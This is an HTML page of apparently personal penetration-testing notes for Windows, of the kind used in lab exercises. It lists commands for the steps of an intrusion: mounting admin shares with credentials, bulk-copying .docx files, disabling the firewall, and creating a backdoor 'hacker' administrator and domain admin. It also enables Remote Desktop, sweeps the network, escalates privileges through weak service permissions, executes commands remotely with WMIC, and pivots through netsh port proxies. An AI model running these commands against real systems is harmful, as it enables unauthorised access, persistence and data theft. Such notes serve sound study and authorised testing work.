<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows</title>
</head><body>Connect to shares<br/>
<br/>
This will attempt to connect to a share and see what is on it.<br/>
<br/>
net use K: \\&lt;IP address\share IE C or Admin&gt; &nbsp;<br/>
<br/>
net use K: \\192.168.31.53\C &nbsp;&lt;--this will connect to the K drive<br/>
<br/>
net use K: \\192.168.31.53\C$ /user:george P@$$Word34 <br/>
<br/>
Find files<br/>
<br/>
dir c: /b /s .docx | findstr /e .docx<br/>
for /R c: %f in (*.docx) do copy %f c:\temp\<br/>
<br/>
<br/>
1.To Turn Off:<br/>
2.NetSh Advfirewall set allprofiles state off<br/>
3.To Turn On:<br/>
4.NetSh Advfirewall set allrprofiles state on<br/>
5.To check the status of Windows Firewall:<br/>
6.Netsh Advfirewall show allprofiles<br/>
<br/>
net group "Domain Admins" uatoperator /add /domain<br/>
<br/>
net user /add hacker HELL0$ir11<br/>
^^^ Add user to computer<br/>
<br/>
net localgroup Administrators hacker /add<br/>
<br/>
^^^^^ Add the user "hacker to admin group"<br/>
<br/>
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f<br/>
<br/>
^^^^^enables Remote Desktop<br/>
<br/>
from windows, type -- **nbtstat -a<br/>
<br/>
if you then see something like &nbsp; &nbsp;ELS-WINXP &nbsp; &nbsp;&lt;20&gt; &nbsp; &nbsp;Unique &nbsp; &nbsp;Registered &nbsp;-- then there is a server or share :)<br/>
<br/>
================<br/>
<br/>
from windows, type net view &lt;IPaddress&gt; &nbsp; ** this should list the shares, domains, and resources on the target<br/>
<br/>
==================<br/>
<br/>
<br/>
<br/>
==================<br/>
<br/>
Do the following from a command prompt to see who you are<br/>
<br/>
echo %username%<br/>
<br/>
echo %userdomain%<br/>
<br/>
whoami<br/>
<br/>
====================<br/>
<br/>
sc query &nbsp;----- list all services :)<br/>
<br/>
*********************<br/>
Once we have AccessChk downloaded on our target machine, GREED, we can run the following command to determine which Services can be modified by any authenticated user (regardless of privilege level):<br/>
<br/>
accesschk.exe -uwcqv "Authenticated Users" * /accepteula<br/>
<br/>
***********************<br/>
<br/>
privesc.bat Everyone Users "Authenticated Users" &nbsp;&lt;---this is for the privilege escalation batch file :)<br/>
<br/>
<br/>
-------------------<br/>
<br/>
ping sweep<br/>
<br/>
for /l %i in(1,1,254) do ping -n 1 -w 100 10.11.1.0%i<br/>
<br/>
<br/>
==============================<br/>
<br/>
unquoted service paths<br/>
<br/>
<span style="color: #ff0000"><b>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br/>
<br/>
------------<br/>
<br/>
</b></span><b>&nbsp;wmic to get a full listing of the running processes:</b><br/>
<br/>
wmic process list full<br/>
<br/>
<b>wmic print to a HTML formatted list of processes:</b><br/>
<br/>
wmic /output:wmic.html process list full /format:hform<br/>
<br/>
<b>wmic query running services:</b><br/>
<br/>
sc query type= service<br/>
<br/>
<b>wmic startup programs:</b><br/>
<br/>
wmic startup list brief<br/>
<br/>
<b>wmic remote command execution:</b><br/>
<br/>
wmic /node:10.0.0.1 /user:Administrator process call create "cmd.exe /c calc.exe"<br/>
<br/>
<b>Format WMIC Queries as html<br/>
<br/>
</b>wmic process list full &gt; output.html<br/>
<br/>
<b>netsh IPv4 to IPv6 port conversion for a remote computer:</b><br/>
<br/>
netsh interface portproxy add v4tov6 listenport=8888 listenaddress=0.0.0.0 connectport=80 connectaddress=2000::1:215:5dff:fe01:247<br/>
<br/>
<b>netsh IPv4 port to another IPv4 port on the same host:</b><br/>
<br/>
netsh interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=445 connectaddress=192.168.1.112<br/>
<br/>
<b>netsh ipconfig:</b><br/>
<br/>
netsh interface ipv4 show addresses<br/>
<br/>
<b>Anywhere with IP reachability to target machine:</b><br/>
<br/>
netsh -r 192.168.1.103 -u entsim\administrator -p P@ssw0rd!<br/>
<br/>
</body></html>